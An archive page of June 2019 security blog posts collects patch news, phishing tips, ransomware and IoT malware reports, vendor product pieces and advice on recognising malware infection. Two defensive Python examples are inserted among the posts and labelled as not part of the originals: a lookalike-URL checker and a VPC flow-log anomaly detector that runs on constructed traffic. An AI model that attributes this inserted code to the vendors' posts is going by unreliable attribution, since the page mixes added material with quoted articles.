Monthly Archives: June 2019

Tripwire Patch Priority Index for June 2019

Tripwire’s June 2019 Patch Priority Index (PPI) brings together important vulnerabilities from Microsoft, Oracle, and Adobe. First and most importantly this month are patches available to resolve two deserialization vulnerabilities in Oracle WebLogic, identified as CVE-2019-2725 and CVE-2019-2729. Both of these vulnerabilities allow remote code execution over a network without authentication. […]

The post Tripwire Patch Priority Index for June 2019 appeared first on The State of Security.

How to Avoid Common Software Vulnerability Management Mistakes

Vulnerability management (VM) is an essential process through which organizations can reduce risk in their environments. But myths and misconceptions surrounding VM abound. For instance, organizations commonly approach vulnerability management in the same way as they do patch management. Others are guilty of believing that all attacks rely on vulnerabilities, while others still are under […]

The post How to Avoid Common Software Vulnerability Management Mistakes appeared first on The State of Security.

#Verified or Phishing Victim? 3 Tips to Protect Your Instagram Account

If you’re an avid Instagram user, chances are you’ve come across some accounts with a little blue checkmark next to the username. This little blue tick is Instagram’s indication that the account is verified. While it may seem insignificant at first glance, this badge actually means that Instagram has confirmed that the account is an authentic page of a public figure, celebrity, or global brand. In today’s world of social media influencers, receiving a verified badge is desirable so other users know you’re a significant figure on the platform. However, cybercriminals are taking advantage of the appeal of being Instagram verified as a way to convince users to hand over their credentials.

So, how do cybercriminals carry out this scheme? According to security researcher Luke Leal, this scam was distributed as a phishing page through Instagram. The page resembled a legitimate Instagram submission page, prompting victims to apply for verification. After clicking on the “Apply Now” button, victims were taken to a series of phishing forms with the domain “Instagramforbusiness[.]info.” These forms asked users for their Instagram logins as well as confirmation of their email and password credentials. However, if the victim submitted the form, their Instagram credentials would make their way into the cybercriminal’s email inbox. With this information, the cybercrooks would have unauthorized access to the victim’s social media page. What’s more, since this particular phishing scam targets a user’s associated email login, hackers would have the capability of resetting and verifying ownership of the victim’s account.

Whether you’re in search of an Instagram verification badge or not, it’s important to be mindful of your cybersecurity. And with Social Media Day right around the corner, check out these tips to keep your online profiles protected from phishing and other cyberattacks:

  • Exercise caution when inspecting links. If you examine the link used for this scam (Instagramforbusiness[.]info), you can see that it is not actually affiliated with Instagram.com. Additionally, it doesn’t use the secure HTTPS protocol, indicating that it is a risky link. Always inspect a URL before you click on it. And if you can’t tell whether a link is malicious or not, it’s best to avoid interacting with it altogether.
  • Don’t fall for phony pages. If you or a family member is in search of a verified badge for their Instagram profile, make sure they are familiar with the process. Instagram users should go into their own account settings and click on “Request on verification” if they are looking to become verified. Note that Instagram will not ask for your email or password during this process, but will send you a verification link via email instead.
  • Reset your password. If you suspect that a hacker is attempting to gain control of your account, play it safe by resetting your password.
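The first tip above (inspect the link before you click it) can be turned into a small, repeatable check. The following is an added example, not code from the McAfee post: it refangs a defanged URL such as the one quoted in the article, checks that the link uses HTTPS, and checks whether the registrable domain is actually one the brand controls or merely imitates it. The trusted-domain allowlist and the test URLs are assumptions constructed for illustration.

```python
"""Added example (not from the original post): apply the "inspect the link"
advice as a function. Allowlist and sample URLs are constructed assumptions."""
from urllib.parse import urlsplit

# Assumption for this example: only instagram.com is treated as brand-controlled.
TRUSTED_DOMAINS = {"instagram.com"}
# Brand keywords whose presence in an untrusted hostname is a lookalike signal.
BRAND_KEYWORDS = ("instagram",)


def refang(url: str) -> str:
    """Turn the defanged form used in write-ups ('example[.]com', 'hxxp') back into a real URL."""
    return url.replace("[.]", ".").replace("hxxp", "http")


def registered_domain(host: str) -> str:
    """Approximate the registrable domain as the last two labels.
    Assumption: no public-suffix list is consulted, so 'co.uk'-style suffixes are not handled."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def inspect_url(url: str) -> dict:
    """Return a verdict plus the concrete reasons a reader (or a mail filter) should distrust the link."""
    parts = urlsplit(refang(url.strip()))
    host = (parts.hostname or "").lower()
    reasons = []
    if parts.scheme != "https":
        reasons.append("not served over HTTPS")
    domain = registered_domain(host)
    if domain not in TRUSTED_DOMAINS:
        reasons.append(f"registered domain '{domain}' is not an official brand domain")
        if any(kw in host for kw in BRAND_KEYWORDS):
            reasons.append("hostname imitates the brand name (lookalike domain)")
    # A userinfo '@' in the authority part hides the real host: https://instagram.com@evil.example/
    if "@" in parts.netloc:
        reasons.append("URL contains a userinfo '@' that can disguise the real host")
    return {"host": host, "domain": domain, "suspicious": bool(reasons), "reasons": reasons}


if __name__ == "__main__":
    for sample in ("https://www.instagram.com/accounts/login/",
                   "http://Instagramforbusiness[.]info/apply"):
        verdict = inspect_url(sample)
        print(sample, "->", "SUSPICIOUS" if verdict["suspicious"] else "ok", verdict["reasons"])
```

The check deliberately looks at the registrable domain rather than at the presence of the word "instagram" anywhere in the URL, because that word appears in both the legitimate and the lookalike hostname; only the last two labels decide who actually controls the site.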

And, as usual, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post #Verified or Phishing Victim? 3 Tips to Protect Your Instagram Account appeared first on McAfee Blogs.

Using Amazon Web Services? Cisco Stealthwatch Cloud has all your security needs covered

Like many consumers of public cloud infrastructure services, organizations that run workloads in Amazon Web Services (AWS) face an array of security challenges that span from traditional threat vectors to the exploitation of more abstract workloads and entry points into the infrastructure.

This week at AWS re:Inforce, a new feature for AWS workload visibility was announced – AWS Virtual Private Cloud (VPC) Traffic Mirroring. This feature allows for a full 1:1 packet capture of the traffic flowing within, into and out of a customer’s VPC environment. This allows vendors to provide visibility into all of the AWS traffic and to perform network and security analytics on it. Cisco Stealthwatch Cloud is able to fully leverage VPC Traffic Mirroring for transactional network conversation visibility, threat detection and compliance risk alerting.

Stealthwatch Cloud is actually unique in that we have had this level of traffic visibility and security analytics deep within an AWS infrastructure for a number of years now with our ability to ingest AWS VPC Flow Logs. VPC Flow Logs allow for a parallel level of visibility in AWS without having to deploy any sensors or collectors. This method of infrastructure visibility allows for incredibly easy deployment within many AWS VPCs and accounts at scale in a quick-to-operationalize manner with Stealthwatch Cloud’s SaaS visibility and threat detection solution. In fact, you can deploy Stealthwatch Cloud within your AWS environment in as little as 10 minutes!

Additionally, we are seeing that the majority of customer traffic in, out and within a VPC is encrypted. Stealthwatch Cloud is designed from the ground up to assume that the traffic is encrypted and to model every entity and look for threats leveraging a multitude of data points regardless of payload.
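To make the two preceding paragraphs concrete, here is an added example that is not Cisco's code and not part of Stealthwatch Cloud: a minimal detector over AWS VPC Flow Log records in the default version 2 space-separated format. It learns a per-interface "known good" set of destinations from a baseline window and then flags new destinations, unusually large transfers and many rejected ports from one source. It uses only connection metadata, so it behaves identically whether or not the payload is encrypted. The log lines, account id, interface id and thresholds are constructed sample values.

```python
"""Added example (not Cisco's code): baseline-and-deviation detection over
VPC Flow Log records. All log lines and identifiers below are constructed."""
from collections import defaultdict

# Default VPC Flow Log v2 field order (this part is the documented AWS format).
FIELDS = ("version account_id interface_id srcaddr dstaddr srcport dstport "
          "protocol packets bytes start end action log_status").split()

# Constructed "learning window": normal traffic from one instance to an internal web and DB tier.
BASELINE_LOG = """\
2 123456789012 eni-0a1b2c3d 10.0.1.20 10.0.2.30 43210 443 6 12 3400 1561000000 1561000060 ACCEPT OK
2 123456789012 eni-0a1b2c3d 10.0.1.20 10.0.2.30 43211 443 6 10 2900 1561000060 1561000120 ACCEPT OK
2 123456789012 eni-0a1b2c3d 10.0.1.20 10.0.2.40 43212 5432 6 30 9000 1561000120 1561000180 ACCEPT OK
2 123456789012 eni-0a1b2c3d - - - - - - - 1561000180 1561000240 - NODATA
"""

# Constructed "detection window": one normal flow, one large flow to a new external host,
# and three rejected probes from one external source.
DETECTION_LOG = """\
2 123456789012 eni-0a1b2c3d 10.0.1.20 10.0.2.30 43300 443 6 11 3100 1561003600 1561003660 ACCEPT OK
2 123456789012 eni-0a1b2c3d 10.0.1.20 203.0.113.9 43301 4444 6 200 5200000 1561003660 1561003720 ACCEPT OK
2 123456789012 eni-0a1b2c3d 198.51.100.7 10.0.1.20 55001 22 6 1 60 1561003720 1561003780 REJECT OK
2 123456789012 eni-0a1b2c3d 198.51.100.7 10.0.1.20 55002 23 6 1 60 1561003720 1561003780 REJECT OK
2 123456789012 eni-0a1b2c3d 198.51.100.7 10.0.1.20 55003 3389 6 1 60 1561003720 1561003780 REJECT OK
"""


def parse(log_text):
    """Parse flow log lines into dicts; skip malformed lines and NODATA/SKIPDATA records."""
    records = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != len(FIELDS):
            continue
        rec = dict(zip(FIELDS, parts))
        if rec["log_status"] != "OK":
            continue  # no flow data captured in that interval
        for k in ("srcport", "dstport", "packets", "bytes"):
            rec[k] = int(rec[k])
        records.append(rec)
    return records


def learn_baseline(records):
    """Known good: the (dstaddr, dstport) pairs each interface was seen ACCEPTing to."""
    baseline = defaultdict(set)
    for r in records:
        if r["action"] == "ACCEPT":
            baseline[r["interface_id"]].add((r["dstaddr"], r["dstport"]))
    return baseline


def detect(records, baseline, egress_bytes_threshold=1_000_000, reject_port_threshold=3):
    """Return (alert_type, interface_id, detail) tuples for deviations from the baseline."""
    alerts = []
    rejected_ports = defaultdict(set)  # (srcaddr, interface) -> distinct rejected dst ports
    for r in records:
        eni = r["interface_id"]
        if r["action"] == "ACCEPT":
            if (r["dstaddr"], r["dstport"]) not in baseline.get(eni, set()):
                alerts.append(("new-destination", eni, f"{r['dstaddr']}:{r['dstport']}"))
            if r["bytes"] >= egress_bytes_threshold:
                alerts.append(("large-transfer", eni,
                               f"{r['bytes']} bytes to {r['dstaddr']}:{r['dstport']}"))
        elif r["action"] == "REJECT":
            rejected_ports[(r["srcaddr"], eni)].add(r["dstport"])
    for (src, eni), ports in rejected_ports.items():
        if len(ports) >= reject_port_threshold:
            alerts.append(("port-scan", eni, f"{src} rejected on ports {sorted(ports)}"))
    return alerts


def run():
    """Learn from the baseline window, then evaluate the detection window."""
    return detect(parse(DETECTION_LOG), learn_baseline(parse(BASELINE_LOG)))


if __name__ == "__main__":
    for alert in run():
        print(*alert)
```

The thresholds are deliberately simple; a production system would learn them per entity and over time. The point the passage makes survives in the code: none of these signals needs packet contents, which is why the approach works on encrypted traffic.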

Stealthwatch Cloud takes the AWS visibility and protection capability even deeper by leveraging the AWS API to retrieve a wide array of telemetry from the AWS backend to tell a richer story of what’s actually going on throughout the AWS environment, far beyond just monitoring the network traffic itself. We illuminate API keys, user accounts, CloudTrail audit log events, instance tags, abstract services such as Redshift, RDS, Inspector, ELBs, Lambdas, S3 buckets, NAT Gateways and many other services that our customers use beyond just VPCs and EC2 instances.

Here is a screenshot from the customer portal with just a sample of the additional value Stealthwatch Cloud offers AWS customers in addition to our network traffic analytics:

The following screenshot shows how we are able to extend our behavioral anomaly detection and modeling far beyond just EC2 instances and are able to learn “known good” for API keys, user accounts and other entry points into the environment that customers need to be concerned about:

Combine this unique set of rich AWS backend telemetry with the traffic analytics that we can perform with either VPC Flow Logs or VPC Traffic Mirroring, and we are able to ensure that customers are protected regardless of where the threat vector into their AWS deployment may exist – at the VPC ingress/egress, at the AWS web login screen or leveraging API keys. Cisco is well aware that our customers are using a broad set of services in AWS that stretch from virtual machines to serverless and Kubernetes. Stealthwatch Cloud is able to provide the visibility, accountability and threat detection across the Kill Chain in any of these environments today.

Try today!

Interested in Cisco Stealthwatch Cloud? You can try it today with our no-risk, 60-day free trial. To sign up, click here or visit us on the AWS Marketplace.


Microsoft to Require Multi-Factor Authentication for Cloud Solution Providers

It might be difficult to fathom how this isn’t already mandatory, but Microsoft Corp. says it will soon force all Cloud Solution Providers (CSPs) that help companies manage their Office365 accounts to use multi-factor authentication. The move comes amid a noticeable uptick in phishing and malware attacks targeting CSP employees and contractors.

When an organization buys Office365 licenses from a reseller partner, the partner is granted administrative privileges in order to help the organization set up the tenant and establish the initial administrator account. Microsoft says customers can remove that administrative access if they don’t want or need the partner to have access after the initial setup.

But many companies partner with a CSP simply to gain more favorable pricing on software licenses — not necessarily to have someone help manage their Azure/O365 systems. And those entities are more likely to be unaware that just by virtue of that partnership they are giving someone at their CSP (or perhaps even outside contractors working for the CSP) full access to all of their organization’s email and files stored in the cloud.

This is exactly what happened with a company whose email systems were rifled through by intruders who broke into PCM Inc., the world’s sixth-largest CSP. The firm had partnered with PCM because doing so was far cheaper than simply purchasing licenses directly from Microsoft, but its security team was unaware that a PCM employee or contractor maintained full access to all of their employees’ email and documents in Office365.

As it happened, the PCM employee was not using multi-factor authentication. And when that PCM employee’s account got hacked, so too did many other PCM customers.

KrebsOnSecurity pinged Microsoft this week to inquire whether there was anything the company could be doing to better explain this risk to customers and CSP partners. In response, Microsoft said while its guidance has always been for partners to enable and require multi-factor authentication for all administrators or agent users in the partner tenants, it would soon be making it mandatory.

“To help safeguard customers and partners, we are introducing new mandatory security requirements for the partners participating in the Cloud Solution Provider (CSP) program, Control Panel Vendors, and Advisor partners,” Microsoft said in a statement provided to KrebsOnSecurity.

“This includes enforcing multi-factor authentication for all users in the partner tenants and adopting secure application model for their API integration with Microsoft,” the statement continues. “We have notified partners of these changes and enforcement will roll out over the next several months.”

Microsoft said customers can check or remove a partner’s delegated administration privileges from their tenants at any time, and that guidance on how to do this is available here and here.

This is a welcome — if long overdue — change. Countless data breaches are tied to weak or default settings. Whether we’re talking about unnecessary software features turned on, hard-coded passwords, or key security settings that are optional, defaults matter tremendously because far too many people never change them — or they simply aren’t aware that they exist.

Cyber News Rundown: Second Florida Ransomware Attack


Second Florida City Pays Ransom

Following the news that Riviera Beach, FL would pay the ransom demanded by cyberattackers, the mayor of Lake City, FL has announced that the city will be paying the demanded ransom of $460,000 to restore access to their email and internal system servers. While law enforcement agencies strongly recommend against paying the ransom and suggest that victims instead attempt to recover encrypted files through backups or other offline methods, many companies who fall prey to ransomware attacks do not keep complete backups of their systems, so they may have no choice but to pay.

Group Arrested in Domain Spoofing Scam

Several individuals were recently arrested for creating a spoof domain for Blockchain.com, a site that allows users to access their cryptocurrency wallets. The individuals in question successfully stole over $27 million worth of various currencies from roughly 4,000 victims by using their spoofed site to steal wallet credentials. The group was captured in two separate countries after more than a year of investigation.

Database for Insurance Marketing Site Exposed

A database belonging to MedicareSupplement.com, an insurance marketing site, was found to be publicly accessible, exposing the records of over 5 million customers. While it is unclear how long the database had been improperly secured, the researcher who discovered it in mid-May promptly reported it to the database owner. Amongst data exposed were nearly a quarter million records that indicated specific insurance categories.

Report Reveals Countries Most Targeted by Ransomware

A new report has run the numbers to uncover the top five countries most targeted by ransomware. So far in 2019, the list includes the USA, Brazil, India, Vietnam, and Turkey. During the first quarter of this year alone, the USA took 11% of the attacks, with Brazil coming in right behind with 10% of the total number of attacks. Even more concerning: the average ransom demand has nearly doubled since this time last year, jumping from around $6,700 to ca. $12,700.

IoT Malware Bricks Devices

Researchers have just found a new type of malware, dubbed Silex, that focuses on IoT devices running with default credentials. The malware then bricks—i.e., breaks in an irreparable or unrecoverable fashion—the entire device. The Silex authors claim to have distributed it with the specific intention of rendering devices unusable to prevent lower level scripters from adding the devices to their botnets. Fortunately, the authors did shut down the malware’s command servers, though the already-distributed samples will continue their operations until they have been removed by security.

The post Cyber News Rundown: Second Florida Ransomware Attack appeared first on Webroot Blog.

Is Cloud Service Provider-Native Security ‘Good Enough’ For Your Cloud Transformation Program’s Goals?

Several times lately, CIOs and CISOs have asked me why the security toolset they get for “free” from their cloud service providers isn’t enough. Sure, it might not be the best … but isn’t it good enough for the program’s success?

It’s true that we don’t often need the Cadillac. But cloud programs are failing at high rates, and the number-one listed reason is security challenges. Teams are trying to use that SaaS or IaaS/PaaS cloud service provider-native security and finding after initial designs that it’s full of holes, or that it’s very difficult to operate across the enterprise. And trying to bolt on additional security to highly automated cloud deployments is not nearly as easy as it was in steadier-state traditional data center configurations. We as solution engineers are failing our development, business and security teams by not addressing the number-one factor in cloud transformation failure with tools that will better support their success in delivering secure cloud implementations.

Figure 1: Percent of respondents with major cloud programs reporting they have “fully achieved” their expected cloud outcomes

Figure 2:  Top concerns perceived to impact that lack of full program goal attainment

The CSPs and enterprise software providers just aren’t considering full architectural requirements for security, at a time when architecture overall—and security architecture in particular—is more important than ever. And they don’t have that perspective: Operating a complete end-to-end security architecture and program isn’t the perspective of these software companies’ product teams. Enterprise security is still needed, but new perspectives, more flexibility and support for automated architectures are also needed. Cloud deployments move so fast that we get to the point of “hard to add budget and redesign for efficiency” faster than ever before. We’re asking our development teams to walk a high wire, creating new technologies that enable business using new cloud technologies … but we’re assuming that those new cloud technologies are coming with their own security safety nets. And the market experience is that they don’t.

A better approach is to ENSURE a practical, agile security architecture starting with Cloud Access Security Broker (CASB) basics in place as a foundation of any major cloud transformation program. This gives us detective—and quickly available preventative—controls to ensure that while valuable risks are taken by our development and business teams who build fast in SaaS or IaaS/PaaS cloud, we are protecting them and the enterprise from egregious configuration errors and other easy mistakes up on that high wire.

When I’m developing services, I want to work with market-proven tools—they create an environment for my success.  

What do you think? Are SaaS or IaaS/PaaS “built-in” security controls sufficient, or is a considered enterprise security architecture still necessary? Should we design that security architecture as base to programs or after giving CSPs’ own controls a chance to fail? Always interested in your feedback.

Next month, we’ll look at the highest-priority components of a complete cloud security architecture.

The post Is Cloud Service Provider-Native Security ‘Good Enough’ For Your Cloud Transformation Program’s Goals? appeared first on McAfee Blogs.

Business-Focused Approach to Security Assurance Is More Evolution Than Revolution


According to a new research report from Information Security Forum (ISF), only 32 percent of its membership is satisfied with their security assurance program – though 80 percent say that they want to take a more business-focused approach to security. Given the ever-evolving threat landscape, security leaders understand that they always need their finger on the pulse of how secure their organization’s information is. This can prove to be challenging if the right processes and controls are not in place across development, IT, and security in your organization.

Oftentimes, communicating the security of your organization – and communicating it well – comes down to asking the right people the right questions, and taking smaller steps to achieve the desired outcome. In the report, Establishing a Business-Focused Security Assurance Program, ISF proposes that organizations build on existing compliance-based approaches instead of reinventing the wheel. To map out where the program needs to go and begin evolving it with business in mind, ISF notes that security leaders should:

  • Identify what business stakeholders want from security assurance
  • Break down the requirements into manageable tasks to move from current to future approaches
  • Apply repeatable security assurance process across multiple target environments (i.e. business processes, projects and supporting assets where appropriate in your organization)

“Taking a business-focused approach to security assurance is an evolution. It means going a step further and demonstrating how well business processes, projects and supporting assets are really protected, by focusing on how effective controls are,” said Steve Durbin, Managing Director, ISF. “A business-focused approach requires a broader view, considering the needs of multiple stakeholders within the organization: what do they need to know, when and why? Answering these questions will enable adoption of testing, measurement and reporting techniques that provide appropriate evidence.”

Including Secure Coding in the Security Control Discussion

According to the 2019 Verizon Data Breach Investigations Report, 62 percent of breaches and 39 percent of incidents occur at the web application layer. While it is unclear exactly how the web applications were compromised in some cases, it’s assumed that attackers are scanning for specific web app vulnerabilities, exploiting them to gain access, inserting some kind of malware, and harvesting personal data to create a profit.

An often-overlooked way to tighten security in your organization is to provide developers with the tools they need to code securely, and to continue learning about different vulnerabilities as they work. When development teams are able to scan for vulnerabilities in their code while they work, they’re less likely to be introduced in the QA and production stages. The State of Software Security Report Volume 9 shows that organizations that are conducting application security scanning more than 300 times per year are able to shorten flaw persistence by 11.5 percent.

This means that development leaders must be included in security control discussions. Their team may work in a different way than others across your organization, so understanding how to support them to make security a seamless priority in their day-to-day processes is a necessary step for security assurance. Once the DevSecOps approach to application development has been adopted, it’s even easier to verify for your executives – as well as customers and prospects – that you really do take security seriously.

The Right Analytics to Tell the Right Story

Analytics are useful for determining exactly what the right metrics are for AppSec managers to share with executives and their board. Given that policy compliance is often the number one priority for this audience, AppSec managers need to set their threshold for what they’re willing to accept and what they’re unwilling to accept when it comes to the appropriate level of risk and the type of data involved.

The Veracode Platform includes Veracode Analytics, which empowers our customers to set up custom analytics once they’ve determined their risk threshold and application criticality. With an easy-to-use dashboard view, AppSec managers can review their AppSec program to make sure that development and security teams alike are scanning all of their applications – and fixing what they find.

The Veracode Platform and Veracode Analytics can be a game-changer for your business, as it helps you to stay focused, motivate your teams, ensure better resource allocation, and help you more strategically communicate your security posture to the executive team.

For more on getting executive support for application security, see Everything You Need to Know About Getting AppSec Buy-In.

For more on measuring your application security program, see Everything You Need to Know About Measuring Your AppSec Program.

This Week in Security News: Malvertising and Internet of Things Malware

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about a new Internet of Things malware that’s bricked thousands of devices. Also, read about a ransomware family that’s using malvertising to direct victims to a RIG exploit kit.

Read on:


Shadowgate Returns to Worldwide Operations with Evolved Greenflash Sundown Exploit Kit

After almost two years of sporadic restricted activity, the ShadowGate campaign has started delivering cryptocurrency miners with a newly upgraded version of the Greenflash Sundown exploit kit, which has been spotted targeting global victims after primarily operating in Asia. 

Silex Malware Bricks IoT Devices with Weak Passwords

A new Internet of Things malware called Silex only operated for about a day, though it has already managed to quickly spread and wipe devices’ firmware, bricking thousands of IoT devices. 

Top Takeaways from AWS Security Chief Stephen Schmidt at re:Inforce 2019

Stephen Schmidt’s keynote address at AWS re:Inforce touched on the current state of cloud security, building a security culture, tactical security tips and a road map of where the industry and technology are headed.

AWS re:Inforce Warm-Up Episode

Mark Nunnikhoven gives key predictions and insights into trends at AWS re:Inforce, security in the top three major public cloud providers and the evolution of the cloud industry as a whole. 

Dell Urges Millions of Users to Patch Vulnerability in SupportAssist Tool

Dell released a security advisory that implored customers to update the vulnerable SupportAssist application in both business and home machines. The privilege escalation vulnerability can give hackers access to sensitive information and control over millions of Dell computers running Windows.

HTTPS Protocol Now Used in 58% of Phishing Websites

According to the Q1 2019 report from the Anti-Phishing Working Group (APWG), the Hypertext Transfer Protocol Secure (HTTPS) protocol tactic has been on the rise in phishing attacks, now used in 58% of phishing websites.  

Federal Cybersecurity Defenses are Critical Failures, Senate Report Warns

A 10-month review of 10 years of inspector general reports revealed that several Federal agencies responsible for safeguarding millions of Americans’ security, public safety and personal data have failed to apply even basic defenses to cyberattacks.

Kubernetes Vulnerability CVE-2019-11246 Discovered Due to Incomplete Updates from a Previous Flaw

Kubernetes announced the discovery of a high-severity vulnerability that, if exploited, could lead to a directory traversal that allows an attacker to use a malicious container to create or replace files in a user’s workstation. 

The IIoT Attack Surface: Threats and Security Solutions

Many manufacturing factories and energy plants have hundreds of IIoT devices that help streamline operations, but those facilities now also have to defend against new threats that take advantage of attack vectors and weaknesses in the technology. 

Facebook’s Bid to Quash Data Breach Lawsuit Dismissed by Judge

Facebook has failed in its attempt to prevent a lawsuit over a data breach impacting close to 30 million users from going to trial. A federal appeals court in San Francisco rejected the social media giant’s request to dismiss the court case out of hand.

Sodinokibi Ransomware Group Adds Malvertising as Delivery Technique

Attackers behind a ransomware family called Sodinokibi have used a variety of delivery vectors since April: malicious spam, vulnerable servers, managed server providers (MSPs) and now malvertising. The malicious advertisements were on the PopCash ad network, and certain conditions would redirect users to the RIG exploit kit. 

CVE-2019-8635: Double Free Vulnerability in Apple macOS Lets Attackers Escalate System Privileges and Execute Arbitrary Code

Trend Micro discovered and disclosed a double free vulnerability in macOS that, if successfully exploited, can allow an attacker to implement privilege escalation and execute malicious code on the system with root privileges.

Using Whitelisting to Remediate an RCE Vulnerability (CVE-2019-2729) in Oracle WebLogic

Trend Micro took a closer look at Oracle’s recent vulnerability CVE-2019-2729 to see how this class of vulnerability has been remediated — particularly via blacklisting or whitelisting — and why it has become a recurring security issue.

95,000 Delawareans Impacted in Data Breach that Lasted Nearly Nine Years

The personal data of roughly 95,000 Delawareans may have been compromised in a nine-year security breach at Dominion National, a large vision and dental insurer, according to Delaware’s Department of Insurance.

Do you feel that the IoT devices in your home are well-protected against cyberattacks? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay. 

The post This Week in Security News: Malvertising and Internet of Things Malware appeared first on .

13+ Warning Signs that Your Computer is Malware-Infected [Updated 2019]

Here’s one of the scenarios you may not like, but which sadly, could happen to you any day. You’re working on an important project and suddenly, you start seeing annoying pop-ups showing up on your computer. More than that, it takes too long for your files or apps to load. You keep waiting until you start asking yourself: “Is my computer infected with malware?”

Unfortunately, the answer might be “yes” and your PC could be already compromised with viruses or next-gen malware that are slowing down its performance.

This is one of the many warning signs that show your PC might suffer from malware infection. But there is so much more you need to be aware of and understand, so you can quickly take action.

In this article, we’ll show you the most frequent warning signs of malware infection on computers running Microsoft Windows and what can you do about it.

Use these quick links to easily navigate and see some of the most common warning signs displayed on a computer:

  1. Your computer is slowing down
  2. Annoying ads are displayed
  3. Crashes
  4. Pop-up messages
  5. Internet traffic suspiciously increases
  6. Your browser homepage changed without your input
  7. Unusual messages show unexpectedly
  8. Your security solution is disabled
  9. Your friends say they receive strange messages from you
  10. Unfamiliar icons are displayed on your desktop
  11. Unusual error messages
  12. You can’t access the Control Panel
  13. Everything seems to work perfectly on your PC
  14. You get the error on the browser
  15. You get suspicious shortcut files

Scenario #1: “My computer applications run slowly and they take longer than usual to start.”

If you’re dealing with this scenario, it could mean you have viruses on your computer.

I know, it’s so frustrating to see it working slowly.

It’s a known fact that one of malware’s main activities is to slow down your operating system, no matter if you’re browsing the Internet or simply accessing your local applications.

What can you do?

First, you need to investigate the causes and try to understand what is going on.

Here are some of the most common issues that slow down your PC:

1. Your system’s RAM is low.

This might be caused by the high number of apps you’re currently using.

Windows Task Manager will help you see which programs use the most of your RAM.

Press CTRL+ALT+DELETE simultaneously, choose Task Manager and a list of the current apps you have open will be shown.

2. There is no storage space on your hard disk.

In this case, you need to check all your files stored and do a clean-up.

3. Your browser may be using too many computer resources.

You can see how your browser is performing in Windows Task Manager.

What can you do about your browser’s speed?

Remove unnecessary browser add-ons. Here is a list of Chrome extensions to increase your online safety – just make sure you pick out what you really need and don’t use all of our suggestions simultaneously. Or if you don’t feel like saying goodbye to your favorite extensions, just disable them so they don’t run on each webpage.

Delete excess cache. If you’re carrying along tons of cache and browsing history, this may be the reason your browser is so slow.

Close unnecessary tabs as you open new ones. Oh, the tabs clutter, we’ve all been there. I know, you may be tricked into thinking you may actually need to go back and revisit every tab you’ve opened in a browsing session. But let’s be honest, you most probably won’t need to do it. Just keep in mind you can always reopen your recent browsing history / recently closed tabs – well unless you’re browsing in Incognito/Private mode, but that’s a different story.

4. Your system may be fragmented.

Over time, files kept on a hard drive become fragmented. In simple terms, this means that parts of these files get stored in different areas of the drive and not next to each other. Thus, the storage space is used inefficiently and reduces your PC’s performance, making it harder for your operating system to open a file.

You can fix this by using the Windows disk defragmenter (Optimize Drives).

In Windows 10, Windows 8, and Windows 7, the defragmenter tool runs automatically, so you most probably don’t need to worry about this.

5. Your Windows OS hasn’t been updated or you’re using outdated drivers.

Always make sure your OS is constantly updated. Unpatched systems can have vulnerabilities that can be exploited by malevolent actors, so make sure you’re always running the latest version of Windows.

If you have already thoroughly verified these possible causes and everything seems to work just fine, you can start considering a potential malware infection.

Scenario #2: “I keep getting annoying ads that are opening randomly or strange messages on my computer’s screen.”

Unexpected pop-ups which appear on your screen are a typical sign of a malware infection that wreaks havoc on your computer.

This form of malware is known as spyware and is designed to collect and steal users’ sensitive data without their knowledge.

In this particular case, the main issue is not only the numerous pop-up windows that affect your Internet browsing. It’s also quite difficult to remove them from your system.

These pop-ups are not only frustrating, but they usually come bundled with other concealed malware threats and can be far more destructive for your OS.

They could be disguised as legitimate programs and actually track your web browsing data or monitor your online activity to collect passwords and other personal information.

We strongly recommend that you NEVER CLICK on a suspicious pop-up!

To keep your computer away from malicious threats, make sure you apply these security measures:

  1. Do not click on pop-up windows.
  2. Do not answer unsolicited emails that look strange. Always verify the sender’s email address and never open attachments or click weird links.
  3. Be very careful when you are trying to download free applications.
  4. Use a next-gen threat prevention solution that identifies online dangers and blocks them before they actually get the chance to infect your PC.

Scenario #3: “My laptop keeps crashing when I watch Youtube videos or play games. It simply freezes, then a blue screen shows up.”

So, you got the popular BSOD (Blue Screen of Death). Then it recovered and “told” you Windows was recovering from an unexpected shutdown.

There might be two things causing this type of issue:

  1. You could be dealing with a technical issue caused by a potential incompatibility between your software and/or hardware.
  2. It may be a malware issue.

If you suspect any technical problem, it could be caused by these issues:

Are different programs running on your PC that are in conflict?

Are there any orphaned registry keys which have not been removed that could eventually crash your system?

Orphaned registry keys are pieces of data that have been left behind during the process of uninstalling several programs from your computer. They don’t only take up unnecessary space on your PC but can cause a serious issue for its proper functionality.

How to fix this:

  • Use the Registry Editor (Regedit.exe), which you can open from the Windows search bar or via the Run command.
  • For malware infections:

Run a complete scan of the system with a good antivirus product. And make sure you never get infected with malware by using a complete, all-in-one security suite that catches threats before they happen.

Scenario #4: “I started getting this popup message <You’re running out of disk space on Windows (C:)>”

If you are receiving this warning message, it means there’s no free space left on a particular partition (in this case, C) on the main hard drive on your computer. More and more users are reporting this issue.

The cause? Here’s what Microsoft has to say about this:

This behavior can occur if the free disk space on your computer has dropped below the low disk space notification threshold associated with the Disk Cleanup utility.

How do I fix this?

First of all, check whether your disk usage has been growing lately, or whether some of your files have disappeared or changed their names.

Second, make sure you delete all those old or unnecessary files that can lower your PC’s performance.

Third, this could be another sign of malware infection. There are so many types of malicious programs which use different methods to fill up all the available space in the hard drive and cause it to crash. For this, make sure you’re using an anti-malware solution that automatically performs scans and doesn’t let any viruses or threats reach your system.

Scenario #5: “For quite some time, every time I start my PC, I notice that the Internet traffic suspiciously increases.”

Chances are there is unusually high network activity on your PC, which could be caused by a malware infection.

What can I do?

Check each of these items:

  • The last Windows update for your computer
  • Is there any program or application that’s downloading any data?
  • Is there any update for a certain app running at this moment?
  • Is there a large download that you started and forgot about, which may still be running in the background?

If the answer to all these questions is NO and you can’t find a cause for your increased Internet traffic, then this may be a sign of malware infection. In this case, you should use a specialized security suite designed to address advanced and new online threats.

Scenario #6: “My homepage has changed and I don’t remember doing it myself.”

If you spotted this unusual behavior, a new toolbar shows up out of nowhere, or you’ve been redirected to a web address different from the one you initially accessed, these could be signs of malware infection.

It usually happens when you visit a website and you accidentally click on a link or a pop-up window.

